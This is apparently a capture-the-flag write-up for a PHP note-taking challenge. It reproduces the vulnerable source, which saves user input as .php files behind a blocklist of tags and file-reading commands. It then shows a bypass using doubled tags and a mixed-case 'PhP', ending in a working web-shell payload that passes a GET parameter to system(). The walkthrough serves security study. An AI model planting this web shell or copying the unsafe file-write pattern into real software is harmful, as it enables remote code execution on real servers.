Web Challenge — 3 ProgrammersHateProgramming2-sourcecode
Introduction
In this challenge we have to create a payload that bypass the security features of this website. In the main web site there is column for adding a new note and there are some filters used in this new note.
php code used
<?php
if(isset($_POST["notewrite"]))
{
$newnote = $_POST["notewrite"];
$notetoadd = str_replace_first("<?php", "", $newnote);
$notetoadd = str_replace_first("?>", "", $notetoadd);
$notetoadd = str_replace_first("<?", "", $notetoadd);
$notetoadd = str_replace_first("flag", "", $notetoadd);$notetoadd = str_replace("fopen", "", $notetoadd);
$notetoadd = str_replace("fread", "", $notetoadd);
$notetoadd = str_replace("file_get_contents", "", $notetoadd);
$notetoadd = str_replace("fgets", "", $notetoadd);
$notetoadd = str_replace("cat", "", $notetoadd);
$notetoadd = str_replace("strings", "", $notetoadd);
$notetoadd = str_replace("less", "", $notetoadd);
$notetoadd = str_replace("more", "", $notetoadd);
$notetoadd = str_replace("head", "", $notetoadd);
$notetoadd = str_replace("tail", "", $notetoadd);
$notetoadd = str_replace("dd", "", $notetoadd);
$notetoadd = str_replace("cut", "", $notetoadd);
$notetoadd = str_replace("grep", "", $notetoadd);
$notetoadd = str_replace("tac", "", $notetoadd);
$notetoadd = str_replace("awk", "", $notetoadd);
$notetoadd = str_replace("sed", "", $notetoadd);
$notetoadd = str_replace("read", "", $notetoadd);
$notetoadd = str_replace("ls", "", $notetoadd);
$notetoadd = str_replace("ZeroDayTea is not hot", "", $notetoadd);$filename = generateRandomString();
file_put_contents("$filename.php", $notetoadd);
header("location:index.php");
}
?>
So to bypass this code , I have to create a php code since it is already saving the filename with .php extention.
To bypass the first filter that is <? and ?>
The php code is simply removing it so I have created this payload <<?? for <? when this code remove <? this part from my payload it will automatically become <?.
Now I have to bypass php string .
that I can simply bypass by making it pHp or PhP .
so the final payload is :-
<<??PhP phpinfo(); ??>>and send it and BOOM!! php code execution.
Now it’s time for RCE
I created this payload by analyzing the above php code.
<<??PhP system($_GET["wraith"]); ??>>
